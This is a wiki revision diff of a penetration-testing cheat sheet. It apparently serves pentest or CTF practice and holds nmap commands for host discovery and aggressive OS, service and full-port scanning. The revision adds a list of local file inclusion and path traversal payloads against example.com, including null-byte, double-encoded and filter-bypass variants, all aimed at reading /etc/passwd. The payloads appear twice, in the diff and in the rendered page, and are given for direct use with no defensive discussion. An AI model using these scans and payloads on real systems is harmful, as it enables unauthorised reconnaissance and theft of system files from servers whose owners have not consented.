Difference between revisions of "Cheat Sheet"
| Line 3: | Line 3: | ||
nmap -sP 192.168.56.0/24 | nmap -sP 192.168.56.0/24 | ||
nmap -O -sT -sV -p- -T5 192.168.56.101 | nmap -O -sT -sV -p- -T5 192.168.56.101 | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | ===== LFI / RFI ===== | ||
| + | <syntaxhighlight> | ||
| + | http://example.com/index.php?page=../../../etc/passwd | ||
| + | http://example.com/index.php?page=../../../etc/passwd%00 | ||
| + | http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd | ||
| + | http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 | ||
| + | http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\. | ||
| + | http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd | ||
| + | http://example.com/index.php?page=....//....//etc/passwd | ||
| + | http://example.com/index.php?page=..///////..////..//////etc/passwd | ||
</syntaxhighlight> | </syntaxhighlight> | ||
Revision as of 14:13, 26 April 2018
nmap
nmap -sP 192.168.56.0/24
nmap -O -sT -sV -p- -T5 192.168.56.101LFI / RFI
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd